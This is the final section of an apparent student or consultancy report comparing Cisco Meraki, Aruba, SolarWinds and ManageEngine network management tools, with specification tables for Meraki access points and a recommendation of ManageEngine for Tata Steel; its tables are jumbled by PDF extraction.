
Vendor Software Products Hardware Products

▪ System Management Software ▪ Wireless LAN
Cisco Meraki ▪ Cloud Managed Security and SD WAN
▪ Cloud Managed Switches
▪ AirWave ▪ Access Points
Aruba Networks ▪ ArubaCentral ▪ Switches
▪ Controllers
▪ Aruba Clear Pass
Network Management Tools
▪ Network Management Monitor
▪ Network Configuration Manager
▪ Log Manager
▪ IP Address Manager
SolarWinds ▪ User Device Tracker
▪ Netflow Traffic Analyzer
▪ Network Topology Mapper
Security Management Tools
▪ SIEM tool
▪ Patch Manager
▪ OpManager
Managed Engine ▪ NetFlowAnalyzer
▪ Network Configuration Manager
▪ OpUtils

Utility Comparison among various network management utilities

Cisco Meraki Aruba Networks SolarWinds Managed Engine

Vendor Support Multi-vendor support Multi-vendor support Multi-vendor support Multi-vendor support
Software Support System Management AirWave: monitors client Network Management OpManager: real-time
Software: Provides cloud behavior tools: Provides many fault detector
network support and end Aruba Central: Cloud solutions for network NetFlow Analyzer: does
point security based network monitoring and traffic analysis
management solution management. Network Configuration
Security Management Manager: device
tools: Multi-purpose configuration manager
toolset to configure OpUtils: Ip address
software ids/ips and management software
network policies
OS Available for Android, Available for Android, Desktop version for Available for Android,
Compatibility iOS, Windows and Linux Windows and Linux OS windows OS available Windows and Linux OS
OS

Page 48 of 56
 Network Can draw the real-time Display and export Help export topology Realtime display and
Topology map for an internal customizable maps with maps supported by many export of heat maps as
Mapper network support for external other tools in well known well as network topology
network mapping. formats. maps
End point and With a single dashboard Aruba cloud has an inbuilt Dedicated tools for Dedicated tools for
data Security group and user policies log report extractor and provided security. Auto providing traffic analysis
can be displayed and forensics tool that helps a patching for know CVE and deep packet
edited for a network. lot during incident and other zero-day inspection.
Meraki hardware has response. vulnerabilities. OpManager provides any
inbuilt deep packet fault or breach in the
inspection for finding network during an attack.
malicious data. Device configuration
manager helps set rules
for ids/ips.
Rogue Hardware solutions can Software solution to find Application monitor Dedicated software for
Infrastructure detect rogue points in the rogue access points. prevents any form of network firewall
Detection network and provide real- Inbuilt feature to remotely malicious software to gain configuration to prevent
time analytics. close an application. access. any breach.
Network Health Realtime network node Realtime network health Realtime network and Realtime network and
Monitoring health monitoring. monitoring. application monitoring. application monitoring.
Log Analysis Event based log report Auto log report Auto system, user and Auto application, port,
generation. generation. network log report network, log report
generation generation
Virtualization No exclusive virtual Exclusive Virtual Only supports VMWare Realtime monitoring of
Support machine or hypervisor machine monitoring and officially. bare metal hypervisors.
monitoring support. analytics on performance.
Deep Packet Meraki Access Points and No solutions available Software based IDS/IPS Rule-based filtering of
Inspection Switches have filters for deep packet inspection. provides rule-based packets with software
payloads from layer 1 to Packet filtering in packet filtering in solutions available to
layer 7 of the OSI model network and data link network and data link detect and report possible
layer using hardware layer. malicious packets.
solutions.
System Health Real-time health Real-time health Real-time health Pre-installed Remote
Monitoring monitoring for systems in monitoring for system and monitoring along with desktop utility to connect
a network. network health. maintenance individual and correct any issue in a
application like http, ftp, system of a network.
etc.
Forensics and Auto network defense No dedicated solution for Dedicated SIEM tool Event Log Analyzer that
incident and alert activation in incident response. available for tracking an performs log forensics
response case of an attack. No attack with forensics analysis.
dedicated solution for analysis.
incident response.
DDOS Hardware based IPS. RPF Protect Wireless IPS Log and Event Manager NetFlow Analyzer that
Prevention helps and supports DDOS can detect a DDOS attack.
prevention and migration.

Page 49 of 56
Cisco Meraki Hardware solutions.
Access Points
MR53E/MR53
Radios 1. 2.4 GHz 802.11b/g/n/ac client access radio
2. 5 GHz 802.11a/n/ac Wave 2 client access
radio
3. 2.4 GHz and 5 GHz dual-band WIDS/WIPS,
spectrum analysis, and location analytics
radio
4. 2.4 GHz Bluetooth Low Energy (BLE) radio
with Beacon and BLE scanning support
5. Supported frequency bands (country-
specific restrictions applicable):
a. 2.412-2.484 GHz
b. 5.150-5.250 GHz (UNII-1)
c. 5.250-5.350 GHz (UNII-2)
d. 5.470-5.600, 5.660-5.725 GHz (UNII-2e)
e. 5.1725-5.825 GHz (UNII-3)
Security 1. Integrated Layer 7 firewall with mobile
device policy management
2. Real-time WIDS/WIPS with alerting and
automatic rogue AP containment with Air
Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1Q) and tunneling with
IPSec VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise
with 802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-
SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM)
and Mobile Device Management (MDM)
integration
10. Cisco ISE integration for guest access
and BYOD posturing
Antenna 1. List of compatible antennas: MA-ANT-3-
A5/B5/C5/D5/E5/F5
2. Individual antenna elements for each radio
802.11ac 1. 4×4 multiple input, multiple output (MIMO)
Wave 2 & with four spatial streams
802.11n 2. 4×4 multiple input, multiple output (MIMO)
Capabilities with four spatial streams
3. SU-MIMO and MU-MIMO support
4. Maximal ratio combining (MRC) and
beamforming
MR52
1. 2.4 GHz 802.11b/g/n client access radio
2. 5 GHz 802.11a/n/ac client access radio
3. 2.4 & 5 GHz dual-band WIDS/WIPS, spectrum
analysis, & location analytics radio
4. 2.4 GHz Bluetooth radio with Bluetooth Low
Energy (BLE) and Beacon support
5. Concurrent operation of all four radios
6. Max aggregate frame rate 2.5 Gbit/s
7. Supported frequency bands (country-specific
restrictions apply):
a. 2.412-2.484 GHz
b. 5.150-5.250 GHz (UNII-1)
c. 5.250-5.350 GHz (UNII-2)
d. 5.470-5.600, 5.660-5.725 (UNII-2e)
e. 5.725-5.825 GHz (UNII-3)
1. Integrated Layer 7 firewall with mobile device
policy management
2. Real-time WIDS/WIPS with alerting and
automatic rogue AP containment with Air
Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1q) and tunneling with IPsec
VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise with
802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) &
Mobile Device Management (MDM)
integration.
10. Cisco ISE integration for Guest access
and BYOD Posturing
1. Integrated omni-directional antennas (5 dBi
gain at 2.4 GHz, 6.2 dBi gain at 5 GHz)
2. Individual antenna elements for each radio
1. 4x4 multiple input, multiple output (MIMO)
with four spatial streams
2. SU-MIMO and MU-MIMO support
3. Maximal ratio combining (MRC) &
beamforming
4. 20 & 40 MHz channels (802.11n); 20, 40, 80,
and 160MHz channels (802.11ac)
Page 50 of 56
 5. 20 and 40 MHz channels (802.11n), 20, 40,
80, and 160 MHz channels (802.11ac)
6. Up to 256 QAM on both 2.4 GHz and 5 GHz
bands
7. Packet aggregation
Analytics 1. Embedded location analytics reporting and
device tracking
2. Global L7 traffic analytics reporting per
network, per device, and per application
Power 1. Power over Ethernet: 37-57 V
2. (802.3at required; functionality-restricted
802.3af mode supported)
3. Alternative 12 V DC input
4. Power consumption: 20 W max (802.3at)
5. Power over Ethernet injector and DC
adapter sold separately
Interfaces 1. 1× 100/1000/2.5G BASE-T Ethernet
2. 1× 10/100/1000 BASE-T-Ethernet (RJ45)
3. 1× DC power connector (5.5 mm × 2.5 ×
mm, center positive)
4. Six external RP-TNC antenna connectors
Physical 1. Two security screw options included
Security 2. Kensington lock hard point
3. Concealed mount plate with anti-tamper
cable bay
Physical 1. 10.55" × 6.3" × 1.69" (268 mm × 160 mm ×
Dimension 43 mm), not including desk mount feet or
mount plate
2. Weight: 38.45 oz (1.09 kg)
5. Up to 256-QAM on both 2.4 & 5 GHz
6. Packet aggregation
1. Embedded location analytics reporting and
device tracking
2. Global L7 traffic analytics reporting per
network, per device, & per application
1. Power over Ethernet: 37 - 57 V (802.3at
required; functionality-restricted 802.3af mode
supported)
2. Alternative 12V DC input
3. Power consumption: 21 W max (802.3at)
4. Power over Ethernet injector and DC adapter
sold separately
1. 1× 100/1000/2.5G BASE-T Ethernet & 1×
10/100/1000 BASE-T Ethernet (RJ45)
2. 1 × DC power connector (5.5mm x 2.5mm,
center positive)
1. Two security screw options (included)
2. Kensington lock hard point
3. Concealed mount plate with anti-tamper cable
bay
1. 0.56” x 6.38” x 1.58” (268.2 mm x 162.0 mm x
38.8 mm), not including desk mount feet or
mount plate
2. Weight: 28.9 oz (820g)
Page 51 of 56
 MR42E/MR42
Radios 1. 2.4 GHz 802.11b/g/n client access radio
2. 5 GHz 802.11a/n/ac client access radio
3. 2.4 & 5 GHz dual-band WIDS/WIPS,
spectrum analysis, & location analytics
radio
4. 2.4 GHz Bluetooth radio with Bluetooth
Low Energy (BLE) and Beacon support
5. Concurrent operation of all four radios
6. Max aggregate frame rate 2.5 Gbit/s
7. Supported frequency bands (country-
specific restrictions apply):
a. 2.412-2.484 GHz
b. 5.150-5.250 GHz (UNII-1)
c. 5.250-5.350 GHz (UNII-2)
d. 5.470-5.600, 5.660-5.725 (UNII-2e)
e. 5.725-5.825 GHz (UNII-3)
Security 1. Integrated Layer 7 firewall with mobile
device policy management
2. Real-time WIDS/WIPS with alerting and
automatic rogue AP containment with Air
Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1q) and tunneling with
IPsec VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise
with 802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-
SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) &
Mobile Device Management (MDM)
integration
10. Cisco ISE integration for Guest access and
BYOD Posturin
Antenna 1. Integrated omni-directional antennas (5 dBi
gain at 2.4 GHz, 6.2 dBi gain at 5 GHz)
2. Individual antenna elements for each radio
802.11ac 1. 4x4 multiple input, multiple output (MIMO)
Wave 2 & with four spatial streams
802.11n 2. SU-MIMO and MU-MIMO support
Capabilities 3. Maximal ratio combining (MRC) &
beamforming
4. 20 & 40 MHz channels (802.11n); 20, 40,
80, and 160MHz channels (802.11ac)
5. Up to 256-QAM on both 2.4 & 5 GHz
6. Packet aggregation
Analytics 1. Embedded location analytics reporting and
device tracking
2. Global L7 traffic analytics reporting per
network, per device, & per application
MR20
1. 2.4 GHz 802.11b/g/n client access radio
2. 5 GHz 802.11a/n/ac client access radio
3. 2.4 & 5 GHz dual-band WIDS/WIPS, spectrum
analysis, & location analytics radio
4. 2.4 GHz Bluetooth radio with Bluetooth Low
Energy (BLE) and Beacon support
5. Concurrent operation of all four radios
6. Max aggregate frame rate 2.5 Gbit/s
7. Supported frequency bands (country-specific
restrictions apply):
a. 2.412-2.484 GHz
b. 5.150-5.250 GHz (UNII-1)
c. 5.250-5.350 GHz (UNII-2)
d. 5.470-5.600, 5.660-5.725 (UNII-2e)
e. 5.725-5.825 GHz (UNII-3)
1. Integrated Layer 7 firewall with mobile device
policy management
2. Real-time WIDS/WIPS with alerting and
automatic rogue AP containment with Air
Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1q) and tunneling with IPsec
VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise with
802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) &
Mobile Device Management (MDM) integration
10. Cisco ISE integration for Guest access
and BYOD Posturin
1. Integrated omni-directional antennas (5 dBi
gain at 2.4 GHz, 6.2 dBi gain at 5 GHz)
1. 4x4 multiple input, multiple output (MIMO)
with four spatial streams
2. SU-MIMO and MU-MIMO support
3. Maximal ratio combining (MRC) & beamforming
4. 20 & 40 MHz channels (802.11n); 20, 40, 80,
and 160MHz channels (802.11ac)
5. Up to 256-QAM on both 2.4 & 5 GHz
6. Packet aggregation
1. Embedded location analytics reporting and
device tracking
2. Global L7 traffic analytics reporting per
network, per device, & per application
Page 52 of 56
Power 1. Power over Ethernet: 37 - 57 V (802.3at
required; functionality-restricted 802.3af
mode supported)
2. Alternative 12V DC input
3. Power consumption: 21 W max (802.3at)
4. Power over Ethernet injector and DC adapter
sold separately
Interfaces 1. 2 × 10/100/1000Base-T Ethernet (RJ45)
2. 1 × DC power connector (5.5mm x 2.5mm,
center positive
Physical 1. Two security screw options (included)
Security 2. Kensington lock hard point
3. Concealed mount plate with anti-tamper
cable bay
Physical 1. 10.56” x 6.38” x 1.58” (268.2 mm x 162.0
Dimension mm x 38.8 mm), not including desk mount
feet or mount plate
2. Weight: 28.9 oz (820g)
1. Power over Ethernet: 37 - 57 V (802.3at
required; functionality-restricted 802.3af mode
supported)
2. Alternative 12V DC input
3. Power consumption: 21 W max (802.3at)
4. Power over Ethernet injector and DC adapter
sold separately
1. 1 × 10/100/1000Base-T Ethernet (RJ45)
2. 1 × DC power connector (5.5mm x 2.5mm,
center positive
1. Two security screw options (included)
2. Kensington lock hard point
3. Concealed mount plate with anti-tamper cable
bay
1. 7.95" × 4.88" × 1.02" (202 mm × 124 mm × 25.8
mm), not including desk mount feet or mount
plate
2. Weight: 9.6 oz (272 g)
Page 53 of 56
 CONCLUSION
Recommended Software Stack for Tata Steel Network Management and
Security
Keeping in mind factors like usability, performance, technical support, platform support and
pricing ManageEngine would be a better choice over the other network monitoring and
management tools.
Aruba Networks and Cisco Meraki Network Solutions are hardware based so needs a
considerable amount of installation time. The network management tools as well are dependent
on the specific hardware in order to collect and analyze network data which is not feasible as it
will make the network dependent on a particular network.
Dependency on a single vendor/product can cause the network to be vulnerable to any
unidentified zero-day vulnerability. Records of such incidents are available in the past like the
Mirai malware attack that had affected thousands of Cisco routers, linux devices and IOT
devices causing DDOS on well-known networks.
ManageEngine is a better choice over Solarwinds. The following tools have been tested with
the trial versions available in the respective websites:
• OpManager(ManageEngine)
• Network performance monitor(Solarwinds)

Feature ManageEngine Op Manager Solarwinds Network

performance monitor

Pricing Freemium, Subscription, Free One Time License, Free Trial

Trial.
Mobile Platform support Web Based, iPhone App, Android App
Android App
Network size supported Small Business Mid-size Business
Mid-size Business Enterprise
Enterprise
Customer support Phone support Online support
Online support Knowledge base
Knowledge base Video tutorials
Video tutorials
Pricing Starting from 595.00 USD Starting from 2577.40 USD

Feature comparison API Monitoring

Automatic Backup Real Time Monitoring
Backup Log Remote Monitoring
Capacity Monitoring
Compliance Management
Configuration Management
Data Storage Management

Page 54 of 56
 HIPAA Compliance
IP Address Monitoring
Mail Server Monitoring
Real Time Monitoring
Remote Monitoring
Security Testing
Self-Monitoring
Server Performance
Uptime Monitoring
User Activity Monitoring
Tool Security Encryption Encryption
Encryption of sensitive data at None
rest
HTTPS for all pages
Access control
Access control Multi-factor authentication
Multi-factor authentication options
options
User Licenses 1000-4999 devices supported 100-499 devices supported

Virtual Machine Support VMWare support Does not support virtual

machines

RECOMMENDATION:

From the above comparison its evident that ManageEngine is a better choice over
other cloud network management systems and utilities being software, it reduces
the cost and time of deployment and installation.

Page 55 of 56
 REFERENCES
Useful links and articles:

a) https://www.solarwinds.com/
b) https://meraki.cisco.com/
c) https://www.manageengine.com/
d) https://www.cybrary.it/course/cryptography/
e) https://www.tutorialspoint.com/network_security/index.htm
f) http://www.sifytechnologies.com/blog/what-is-managed-wi-fi-and-why-do-you-need-it/
g) http://www.tripwire.com
h) https://www.networkcomputing.com/cloud-infrastructure/8-cloud-based-it-management-
tools/164697805
i) https://en.wikipedia.org/wiki/Network_management
j) https://en.wikipedia.org/wiki/Network_management_software
k) https://en.wikipedia.org/wiki/Deep_packet_inspection
l) https://en.wikipedia.org/wiki/Network_security
m) https://www.aerohive.com/
n) https://en.wikipedia.org/wiki/Heat_map
o) https://www.hotjar.com/heatmaps

Books:

1. Cryptography and Network Security: Principles and Practice

2. The Practice of Network Security Monitoring: Understanding Incident Detection and
Response.

Page 56 of 56